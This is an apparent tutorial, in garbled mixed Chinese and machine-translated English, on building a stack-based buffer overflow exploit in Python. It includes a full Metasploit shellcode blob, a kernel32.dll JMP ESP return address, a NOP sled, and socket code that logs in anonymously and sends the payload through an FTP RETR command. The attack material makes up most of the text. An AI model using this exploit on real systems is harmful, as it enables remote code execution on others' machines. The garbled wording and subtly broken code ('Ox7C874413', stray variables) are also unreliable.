目錄
一、概述
二、Stack-based buffer overflow attack
2.1、簡介:
2.2、基本術語:
三、Add key elements of your attack
3.1、實現:
四、發送漏洞利用代碼
4.1、分析:
4.2、實現:
雖然在MetasploitThe framework's tool library contains more than 800different exploit codes, But you still have a moment when you have to write the remote exploit code yourself.用Python簡化這個過程,First understand the stack-based buffer overflow
MorrisThe reason for the worm's success is, to some extent, the use of stack buffer overflows.Such vulnerabilities can be successfully exploited, It is caused by thousands of programs failing to filter or validate user input.
2.1、簡介:
in stack-based buffer overflow, Unchecked user data overwrites the next instruction pointer to be executed(EIP)way to control the flow of execution of a program.This exploit code will directly let EIPThe register points to what was inserted by the attackersbellcode上的某個位置.A sequence of machine code instructions(也稱sbellcode)Will let the exploit code add additional users to the target system, Establish a network connection with the attacker, Or download a standalone executable.
ShellcodeThe size is almost unlimited, Its size depends only on the amount of available memory space.There are many different ways to use different types of wither holes today, And stack-based buffer overflow is one of the most
基本的.
2.2、基本術語:
溢出: The length of the user's input exceeds the stack's expected maximum length, That is, the size of the allocated memory
返回地址:Used to jump directly to the top of the stack4B的地址.The following vulnerabilities are being exploited, will use one inkernel32.dl中某條JMP ESP指令的地址(指針的長度為4B).
Padding:在shellcode之前的一系列NOP(無操作)指令, It makes the attacker predict to jump directly there
的地址時, Accuracy requirements can be relaxed.as long as it jumps toNOPanywhere in the chain, can be slid directly toshellcode那裡.
shellcode: A small piece of machine code written in assembly language.在下面的例子中, 我們用Metasploit框架生成
shellcode.
3.1、實現:
Start writing key elements in your exploit code.
首先, 我們在shellcodeWrite to the variableMetasploitThe hex code of the payload generated by the framework.
然後, 在overflowChange sting in writing246個字母“ A"(十六進制值是\x41).
take overret變量指向kernel32.dllOne of them contains the address of an instruction that jumps control flow directly to the top of the stack.我們的paddingvariable is150個NOP指令.這就構成了NOP鏈.
最後,Combining all these variables together forms what we call crash的變量.
shellcode = ("\xbf\x5c\x2a\x11\xb3\xd9\xe5\xd9\x74\x24\xf4\x5d\x33\xc9" "\xb1\x56\x83\xc5\x04\x31\x7d\x0f\x03\x7d\x53\xc8\xe4\x4f" "\x83\x85\x07\xb0\x53\xf6\x8e\x55\x62\x24\xf4\x1e\xd6\xf8" "\x7e\x72\xda\x73\xd2\x67\x69\xf1\xfb\x88\xda\xbc\xdd\xa7" "\xdb\x70\xe2\x64\x1f\x12\x9e\x76\x73\xf4\x9f\xb8\x86\xf5" "\xd8\xa5\x68\xa7\xb1\xa2\xda\x58\xb5\xf7\xe6\x59\x19\x7c" "\x56\x22\x1c\x43\x22\x98\x1f\x94\x9a\x97\x68\x0c\x91\xf0" "\x48\x2d\x76\xe3\xb5\x64\xf3\xd0\x4e\x77\xd5\x28\xae\x49" "\x19\xe6\x91\x65\x94\xf6\xd6\x42\x46\x8d\x2c\xb1\xfb\x96" "\xf6\xcb\x27\x12\xeb\x6c\xac\x84\xcf\x8d\x61\x52\x9b\x82" "\xce\x10\xc3\x86\xd1\xf5\x7f\xb2\x5a\xf8\xaf\x32\x18\xdf" "\x6b\x1e\xfb\x7e\x2d\xfa\xaa\x7f\x2d\xa2\x13\xda\x25\x41" "\x40\x5c\x64\x0e\xa5\x53\x97\xce\xa1\xe4\xe4\xfc\x6e\x5f" "\x63\x4d\xe7\x79\x74\xb2\xd2\x3e\xea\x4d\xdc\x3e\x22\x8a" "\x88\x6e\x5c\x3b\xb0\xe4\x9c\xc4\x65\xaa\xcc\x6a\xd5\x0b" "\xbd\xca\x85\xe3\xd7\xc4\xfa\x14\xd8\x0e\x8d\x12\x16\x6a" "\xde\xf4\x5b\x8c\xf1\x58\xd5\x6a\x9b\x70\xb3\x25\x33\xb3" "\xe0\xfd\xa4\xcc\xc2\x51\x7d\x5b\x5a\xbc\xb9\x64\x5b\xea" "\xea\xc9\xf3\x7d\x78\x02\xc0\x9c\x7f\x0f\x60\xd6\xb8\xd8" "\xfa\x86\x0b\x78\xfa\x82\xfb\x19\x69\x49\xfb\x54\x92\xc6" "\xac\x31\x64\x1f\x38\xac\xdf\x89\x5e\x2d\xb9\xf2\xda\xea" "\x7a\xfc\xe3\x7f\xc6\xda\xf3\xb9\xc7\x66\xa7\x15\x9e\x30" "\x11\xd0\x48\xf3\xcb\x8a\x27\x5d\x9b\x4b\x04\x5e\xdd\x53" "\x41\x28\x01\xe5\x3c\x6d\x3e\xca\xa8\x79\x47\x36\x49\x85" "\x92\xf2\x79\xcc\xbe\x53\x12\x89\x2b\xe6\x7f\x2a\x86\x25" "\x86\xa9\x22\xd6\x7d\xb1\x47\xd3\x3a\x75\xb4\xa9\x53\x10" "\xba\x1e\x53\x31") overflow = "\x41" * 246 ret = struct.pack ('<L', Ox7C874413) #7C874413 JMP ESP kernel32.dll padding = "\x90" * 150 crash = overflow + ret + padding + shellcode
4.1、分析:
使用Berkeley Socket APL can be used with the target hostTCP 21 Port creates a connection.如果成功連接,Log in to the host anonymously.最後會發送FTP命令'RETR", 後面接上crash 變量.Because the affected program cannot properly check user input, This causes a stack-based buffer overflow, 它會覆蓋EIP寄存器, Make the program jump directly toshellcode 那裡, 並執行它
4.2、實現:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: s.connect((target, 21)) except: print('[-]Connection to ' + target + 'failed!') sys.exit(0) print('[*] Sending ' + 'len(crash)' + ' '+ command + ' byte crash... ') s.send("USER anonymous\r\n") s.recv(1024) s.send('PASS \r\n') s.recv(1024) s.send('RETR' + ' ' + crash + '\r\n') time.sleep(4)